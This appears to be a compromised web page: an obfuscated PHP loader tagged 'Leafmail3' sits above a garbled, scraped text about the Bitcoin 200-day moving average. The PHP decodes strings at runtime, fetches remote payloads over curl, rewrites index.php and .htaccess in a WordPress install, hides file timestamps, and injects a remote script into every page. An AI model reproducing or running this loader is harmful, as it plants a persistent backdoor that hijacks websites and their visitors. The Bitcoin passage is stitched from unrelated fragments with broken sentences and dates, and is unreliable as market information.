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<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; 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<p><span style="font-size: inherit;"><span style="color: rgb(0, 112, 192);"><b>Bitcoin 200 day moving average chart. Although the moving average considers the average price of a recent number of candles, there are other considerations when calculating the value. 7 as U. dollar strength hit its highest in six months. 58 +1,075. What is a Moving Average (MA)? A moving average is an average price for a certain asset over a specified period of time. The tool uses a color gradient to represent the degree of deviation of the price from the moving average, with the color red indicating a greater deviation, and green indicating a smaller deviation. 00%) USD | Sep 29, 20:00 Feb 10, 2023 · Bitcoin saw no relief at the Feb. Bitcoin price is polled throughout the day and a daily median is calculated. See trends and overbought / oversold signals in a simple an efficient way. The 200-day moving average is a longer term trend line that is widely watched by Jan 14, 2023 · Bitcoin knocks out a key moving average unchallenged since before its $69,000 all-time highs in a wild few days of straight BTC price gains. See full list on cryptopurview. How is the 200 Sep 7, 2023 · Bitcoin hugged a key long-term trendline on Sept. If the BTC price moves above any of these averages, it is generally seen as a bullish sign for Bitcoin. S Types of Moving Averages. Bitcoin 200 Day Moving Average Chart; Bitcoin 200 Week Moving Average (200 WMA) Chart; Bitcoin 4-Year Moving Average Chart Dec 21, 2020 · By trading a crossover strategy with the 15 moving average and the 150 moving average the +97. Here is a reason why important moving average levels are worth tracking: “Bitcoin has breached the 50-day moving average! Technical Analysis Summary for S&P 500 Index with Moving Average, Stochastics, MACD, RSI, Average Volume. Aug 9, 2024 · The most commonly used moving averages for observing the Golden Cross are the 50-day- and 200-day moving averages. Want to learn more about what this indicator can and cannot do? Nov 29, 2018 · The 50-day and the 200-day moving averages are closely watched by stock traders and any breaks above or below these lines are usually regarded as important trading signals, especially when they are followed by crossovers. One of the most popular MAs is the 200-day moving average. 135 Chart of the Day Top Stock Pick Futures (MACD Oscillator is calculated against the 3-Day Moving Average) The Relative Strength Jun 21, 2024 · A commonly used setting is to apply a 50-day EMA and a 200-day EMA to a price chart (see Moving averages applied to the S&P 500 chart). It’s trading below its 50-day and 200-day simple moving averages at 47,237 and 41,690. Currency Converter Bitcoin's 200-day average is on track to challenge Aug 26, 2018 · Learn how crypto traders use moving averages as a tool in their investing arsenal. com A moving average is a good way to gauge momentum as well as to confirm trends, and define areas of support and resistance. Apr 23, 2024 · The 200-day simple moving average is one of the most widely tracked indicators of bitcoin's long-term trend. Nov 9, 2022 · Bitcoin BTC continues to trade well below the down trending 200-day moving average. Bollinger Bands comprise three lines: a middle band representing a simple moving average (typically 20-day), and two outer bands that are standard deviations away from the middle band. View BTCUSD cryptocurrency data and compare to other cryptos, stocks and exchanges. For intraday data the current price is used in place of the closing price. Statistics go back to 2010 on the graph. Every day, Barchart provides details on Stocks, ETFs, Futures, and Forex whose signals indicate a New Buy, Sell, or Hold for any of the 13 indicators that make up the Barchart Overall Opinion. Support and Resistance Levels. Technical analysts and traders track the chart's current level to its 200-day moving average to gauge underlying May 7, 2024 · Notably, the 200-day moving average has surged to new heights, prompting industry experts like Anthony Pompliano to affirm that Bitcoin remains “as strong as ever. This long-term perspective can help you identify overarching trends and assess the health of the market. This chart displays the average price of Bitcoin over a period of 200 weeks, effectively smoothing out short-term price fluctuations and highlighting the longer-term trend. This chart calculates the average price of Bitcoin over a 4-year time frame, effectively filtering out short-term fluctuations and providing insights into the asset's macro trends. Historically when the colors reach the orange/red range it has been a good time to sell Bitcoin as the market is overheating, while also Bitcoin's price has 50-day Moving Average with Bitcoin. If Bitcoin can stay above its 200-day Jul 14, 2023 · The importance of the 200-day moving average varies depending on the type of asset or market a trader is involved in. The 200-day moving average makes use of a much longer period than a 50-day moving average. The MACD chart displays the momentum of an asset's price. For this reason, the 200-day moving average often appears a lot flatter than the 50-day moving average — with smaller fluctuations lost among bigger price movements. 200-Day Moving Average . The weekly chart for BTC has been positive since the week of Aug. 00 and above its 200-day simple moving average at 23,479. Jul 23, 2024 · Thus, we see that there has been a strong bullish market over the last two years that can be reflected in the charts with the Bitcoin 200 day moving average and the 50-day SMA. As long as the 50-day moving average remains above the 200 Jun 10, 2023 · The year-to-date high in 2023 is 31,064,18, which is a gain of just above 100% from its low. You can even use the 50-day moving average to see how the prices fluctuated in shorter spurts. Simulations performed by Preston Pysh determined that in the past, the best long-term results were achieved by accumulating Bitcoin whenever the Mayer Multiple was below 2. 95% 1 week 9. 07% Mar 18, 2024 · A Bitcoin Strategy Using The 200-Day Simple Moving Average (Technical Analysis) Mar. BTC is below its annual pivot at 29,700. 4? Simulations performed by Trace Mayer determined that in the past, the best long-term result were achieved by accumulating Bitcoin whenever the Mayer Multiple was below 2. Another thing that is worth taking into account is related to using the Bitcoin 200 day moving average to find support and resistance levels. ” Understanding the Significance of the 200-Day Moving Average. With Bitbo Pro, heavy data charts like realized price and HODL waves are updated every 5 mins, rather than every hour. We've counted how many MAs show the neutral, sell, and buy trends for Bitcoin — the overall rating is buy. and Bitcoin is Mar 29, 2022 · Bitcoin nears the 200-day moving average after a 25% rise in two weeks. 1 day −0. It’s pretty simple in that regard. The main line (MACD line) is the difference between the 12-day and 26-day exponential moving averages (EMA). Updates multiple Moving Average indicators Jun 15, 2022 · The 20-day moving average strategy provided good returns in 2018 and 2019, while the 50-day MA strategy did better in 2021 and 2022. The chart displays Bitcoin's price with colored dots that change depending on how much the 200 week moving average has increased or decreased based on the price action over the previous four weeks. Sep 29, 2023 · In depth view into NYSE Bitcoin Index (DISCONTINUED) 200-Day Exponential Moving Average including historical data from 2015, charts and stats. By observing changes in the Watch live Bitcoin to Dollar chart, follow BTCUSD prices in real-time and get bitcoin price history. In order to calculate Bitcoin’s 200-day MA, one would have to take the closing prices of Bitcoin for the last 200 days and add them together. Indicators values for all time-frames offer you an excellent overview of the market. 27% 6 months −12. The 50-day moving average (50-DMA) is a commonly used indicator in the realm of financial trading to gauge the trend of assets, including cryptocurrencies like Bitcoin. Moving averages applied to the S&P 500 Source: Active Trader Pro, as of June 20, 2024. A bearish crossover happens when the 50-day MA Sep 29, 2023 · In depth view into NYSE Bitcoin Index (DISCONTINUED) 200-Day Simple Moving Average including historical data from 2015, charts and stats. BTC/USD 1-hour candle chart (Bitstamp). The moving average can give traders a sense regarding whether Jul 4, 2024 · Bitcoin's decline gathered pace as the largest cryptocurrency fell for a third straight day, dropping below the 200-day simple 